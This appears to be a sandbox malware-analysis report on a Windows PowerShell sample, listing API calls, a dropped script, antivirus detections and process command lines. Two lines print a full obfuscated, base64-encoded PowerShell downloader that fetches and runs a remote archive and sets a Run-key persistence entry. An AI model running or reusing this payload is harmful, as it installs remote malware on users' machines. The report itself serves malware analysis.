NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02937000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02938000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02939000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0293a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0293b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0293c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0293d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0293e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0293f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 20, 2023, 9:35 a.m.	process_identifier: 2152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\new.ps1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	PowerShell.exe -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming/new.ps1"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc JgAoACcAYwBkACcAKQAgACQAewBlAE4AdgBgADoAYABBAFAAcABEAEEAdABBAH0AOwAgACQAewBMAGAAaQBuAEsAfQA9ACgAIgB7ADEAfQB7ADQAfQB7ADcAfQB7ADIAfQB7ADUAfQB7ADYAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAHoAaQBwACcALAAnAGgAdAAnACwAJwAvAG0AZQBkAHAAYQAnACwAJwAyADMANAAyADEALgAnACwAJwB0AHAAcwA6ACcALAAnAHUALgBuAGUAdAAvACcALAAnADMAJwAsACcALwAnACkAOwAgACQAewBwAGAAQQBUAEgAfQA9ACQAewBFAE4AdgBgADoAYQBgAFAAUABEAGAAQQBUAEEAfQArACgAKAAoACIAewAwAH0AewAzAH0AewAxAH0AewA0AH0AewAyAH0AIgAgAC0AZgAnAHsAMAB9ACcALAAnAGkAbAAnACwAJwB6AGkAcAAnACwAJwBzACcALAAnAHAALgAnACkAKQAgAC0AZgBbAEMASABBAHIAXQA5ADIAKQA7ACAAJAB7AHAAWgBgAGkAUAB9AD0AJAB7AEUAYABOAHYAOgBhAGAAcABgAFAARABhAFQAQQB9ACsAKAAoACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAZQBhAG0AUwAzAHIAdgBlACcALAAnAGwAeABXAFQAJwAsACcAcgAnACkAKQAgACAALQByAEUAUABsAGEAYwBFACAAKABbAEMASABhAHIAXQAxADAAOAArAFsAQwBIAGEAcgBdADEAMgAwACsAWwBDAEgAYQByAF0AOAA3ACkALABbAEMASABhAHIAXQA5ADIAKQA7ACAAJgAoACIAewAxAH0AewAwAH0AewAzAH0AewA0AH0AewAyAH0AIgAtAGYAIAAnAHIAdAAtAEIAaQB0ACcALAAnAFMAdABhACcALAAnAGUAcgAnACwAJwBzAFQAcgBhAG4AJwAsACcAcwBmACcAKQAgAC0AUwBvAHUAcgBjAGUAIAAkAHsAbABpAGAATgBrAH0AIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAewBwAEEAYABUAEgAfQA7ACAALgAoACIAewAyAH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAJwB4ACcALAAnAHAAYQBuAGQALQBhAHIAYwBoACcALAAnAGUAJwAsACcAaQB2ACcALAAnAGUAJwApACAALQBwAGEAdABoACAAKAAoACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAGkAbABwAC4AegBpAHAAJwAsACcATQBYAHMAJwAsACcALgBuACcAKQApACAAIAAtAEMAcgBlAHAATABhAGMAZQAnAG4ATQBYACcALABbAEMASABBAHIAXQA5ADIAKQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAUABgAHoAaQBwAH0AOwAgACQAewBGAGAATwBMAEQAfQA9AC4AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACcAZQAnACwAJwBHACcALAAnAHQALQBJAHQAZQBtACcAKQAgACQAewBwAGAAWgBJAFAAfQAgAC0ARgBvAHIAYwBlADsAIAAkAHsARgBgAE8ATABEAH0ALgAiAGEAYABUAFQAcgBpAGIAYABVAHQAYABFAHMAIgA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcASABpACcALAAnAGQAZABlAG4AJwApADsAIAAmACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0AZgAnAG8AJwAsACcAUgBlAG0AJwAsACcALQBJAHQAZQBtACcALAAnAHYAZQAnACkAIAAtAHAAYQB0AGgAIAAkAHsAUABBAGAAVABoAH0AOwAgACYAKAAnAGMAZAAnACkAIAAkAHsAcABgAFoAaQBQAH0AOwAgAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAAnACwAJwBzAHQAYQByACcAKQAgACgAIgB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACcAeABlACcALAAnAC4AJwAsACcAYwBsAGkAZQBuAHQAMwAyACcALAAnAGUAJwApADsAIAAkAHsAZgBzAGAAVAByAH0APQAkAHsAUAB6AGAASQBQAH0AKwAoACgAKAAiAHsAMQB9AHsAMwB9AHsANAB9AHsAMAB9AHsANQB9AHsAMgB9ACIAIAAtAGYAIAAnADMAMgAuACcALAAnAHsAMAB9ACcALAAnAHgAZQAnACwAJwBjAGwAJwAsACcAaQBlAG4AdAAnACwAJwBlACcAKQApACAAIAAtAGYAIAAgAFsAQwBoAEEAUgBdADkAMgApADsAIAAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACcATgBlAHcALQBJAHQAZQAnACwAJwBtAFAAJwAsACcAcgBvAHAAZQByAHQAeQAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsAMQAwAH0AewA1AH0AewAwAH0AewAxADMAfQB7ADEAfQB7ADMAfQB7ADgAfQB7ADkAfQB7ADYAfQB7ADQAfQB7ADEAMgB9AHsAMQAxAH0AewAyAH0AewA3AH0AIgAgAC0AZgAgACcAewAwAH0AJwAsACcATwBGAFQAVwBBACcALAAnAG8AbgB7ADAAJwAsACcAUgBFAHsAMAB9AE0AaQBjAHIAbwBzACcALAAnAEMAJwAsACcAOgAnACwAJwAwAH0AJwAsACcAfQBSAHUAbgAnACwAJwBvAGYAdAB7ADAAfQBXAGkAJwAsACcAbgBkAG8AdwBzAHsAJwAsACcASABLAEMAVQAnACwAJwBWAGUAcgBzAGkAJwAsACcAdQByAHIAZQBuAHQAJwAsACcAUwAnACkAKQAtAGYAWwBDAEgAQQBSAF0AOQAyACkAIAAtAE4AYQBtAGUAIAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYQBtACcALAAnAFMAMwByAHYAZQByACcALAAnAFQAZQAnACkAIAAtAFYAYQBsAHUAZQAgACQAewBmAHMAYABUAHIAfQAgACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFMAJwAsACcAdAByAGkAbgBnACcAKQA7AA==
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming/new.ps1"

File has been identified by 7 AntiVirus engines on VirusTotal as malicious (7 events)

Bkav	W32.AIDetect.malware2
Zillya	Trojan.Generic.Win32.1693826
ESET-NOD32	PowerShell/Obfuscated.Z suspicious
Cynet	Malicious (score: 100)
APEX	Malicious
Rising	Trojan.PSRunner/SFX!1.C4E6 (CLASSIC)
DeepInstinct	MALICIOUS

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 20, 2023, 9:35 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 20, 2023, 9:35 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc JgAoACcAYwBkACcAKQAgACQAewBlAE4AdgBgADoAYABBAFAAcABEAEEAdABBAH0AOwAgACQAewBMAGAAaQBuAEsAfQA9ACgAIgB7ADEAfQB7ADQAfQB7ADcAfQB7ADIAfQB7ADUAfQB7ADYAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAHoAaQBwACcALAAnAGgAdAAnACwAJwAvAG0AZQBkAHAAYQAnACwAJwAyADMANAAyADEALgAnACwAJwB0AHAAcwA6ACcALAAnAHUALgBuAGUAdAAvACcALAAnADMAJwAsACcALwAnACkAOwAgACQAewBwAGAAQQBUAEgAfQA9ACQAewBFAE4AdgBgADoAYQBgAFAAUABEAGAAQQBUAEEAfQArACgAKAAoACIAewAwAH0AewAzAH0AewAxAH0AewA0AH0AewAyAH0AIgAgAC0AZgAnAHsAMAB9ACcALAAnAGkAbAAnACwAJwB6AGkAcAAnACwAJwBzACcALAAnAHAALgAnACkAKQAgAC0AZgBbAEMASABBAHIAXQA5ADIAKQA7ACAAJAB7AHAAWgBgAGkAUAB9AD0AJAB7AEUAYABOAHYAOgBhAGAAcABgAFAARABhAFQAQQB9ACsAKAAoACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAZQBhAG0AUwAzAHIAdgBlACcALAAnAGwAeABXAFQAJwAsACcAcgAnACkAKQAgACAALQByAEUAUABsAGEAYwBFACAAKABbAEMASABhAHIAXQAxADAAOAArAFsAQwBIAGEAcgBdADEAMgAwACsAWwBDAEgAYQByAF0AOAA3ACkALABbAEMASABhAHIAXQA5ADIAKQA7ACAAJgAoACIAewAxAH0AewAwAH0AewAzAH0AewA0AH0AewAyAH0AIgAtAGYAIAAnAHIAdAAtAEIAaQB0ACcALAAnAFMAdABhACcALAAnAGUAcgAnACwAJwBzAFQAcgBhAG4AJwAsACcAcwBmACcAKQAgAC0AUwBvAHUAcgBjAGUAIAAkAHsAbABpAGAATgBrAH0AIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAewBwAEEAYABUAEgAfQA7ACAALgAoACIAewAyAH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAJwB4ACcALAAnAHAAYQBuAGQALQBhAHIAYwBoACcALAAnAGUAJwAsACcAaQB2ACcALAAnAGUAJwApACAALQBwAGEAdABoACAAKAAoACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAGkAbABwAC4AegBpAHAAJwAsACcATQBYAHMAJwAsACcALgBuACcAKQApACAAIAAtAEMAcgBlAHAATABhAGMAZQAnAG4ATQBYACcALABbAEMASABBAHIAXQA5ADIAKQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAUABgAHoAaQBwAH0AOwAgACQAewBGAGAATwBMAEQAfQA9AC4AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACcAZQAnACwAJwBHACcALAAnAHQALQBJAHQAZQBtACcAKQAgACQAewBwAGAAWgBJAFAAfQAgAC0ARgBvAHIAYwBlADsAIAAkAHsARgBgAE8ATABEAH0ALgAiAGEAYABUAFQAcgBpAGIAYABVAHQAYABFAHMAIgA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcASABpACcALAAnAGQAZABlAG4AJwApADsAIAAmACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0AZgAnAG8AJwAsACcAUgBlAG0AJwAsACcALQBJAHQAZQBtACcALAAnAHYAZQAnACkAIAAtAHAAYQB0AGgAIAAkAHsAUABBAGAAVABoAH0AOwAgACYAKAAnAGMAZAAnACkAIAAkAHsAcABgAFoAaQBQAH0AOwAgAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAAnACwAJwBzAHQAYQByACcAKQAgACgAIgB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACcAeABlACcALAAnAC4AJwAsACcAYwBsAGkAZQBuAHQAMwAyACcALAAnAGUAJwApADsAIAAkAHsAZgBzAGAAVAByAH0APQAkAHsAUAB6AGAASQBQAH0AKwAoACgAKAAiAHsAMQB9AHsAMwB9AHsANAB9AHsAMAB9AHsANQB9AHsAMgB9ACIAIAAtAGYAIAAnADMAMgAuACcALAAnAHsAMAB9ACcALAAnAHgAZQAnACwAJwBjAGwAJwAsACcAaQBlAG4AdAAnACwAJwBlACcAKQApACAAIAAtAGYAIAAgAFsAQwBoAEEAUgBdADkAMgApADsAIAAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACcATgBlAHcALQBJAHQAZQAnACwAJwBtAFAAJwAsACcAcgBvAHAAZQByAHQAeQAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsAMQAwAH0AewA1AH0AewAwAH0AewAxADMAfQB7ADEAfQB7ADMAfQB7ADgAfQB7ADkAfQB7ADYAfQB7ADQAfQB7ADEAMgB9AHsAMQAxAH0AewAyAH0AewA3AH0AIgAgAC0AZgAgACcAewAwAH0AJwAsACcATwBGAFQAVwBBACcALAAnAG8AbgB7ADAAJwAsACcAUgBFAHsAMAB9AE0AaQBjAHIAbwBzACcALAAnAEMAJwAsACcAOgAnACwAJwAwAH0AJwAsACcAfQBSAHUAbgAnACwAJwBvAGYAdAB7ADAAfQBXAGkAJwAsACcAbgBkAG8AdwBzAHsAJwAsACcASABLAEMAVQAnACwAJwBWAGUAcgBzAGkAJwAsACcAdQByAHIAZQBuAHQAJwAsACcAUwAnACkAKQAtAGYAWwBDAEgAQQBSAF0AOQAyACkAIAAtAE4AYQBtAGUAIAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYQBtACcALAAnAFMAMwByAHYAZQByACcALAAnAFQAZQAnACkAIAAtAFYAYQBsAHUAZQAgACQAewBmAHMAYABUAHIAfQAgACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAFMAJwAsACcAdAByAGkAbgBnACcAKQA7AA==

Creates a suspicious Powershell process (4 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-ep bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

4556qXbHiTtYxMXnMwXziAARUlvy.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All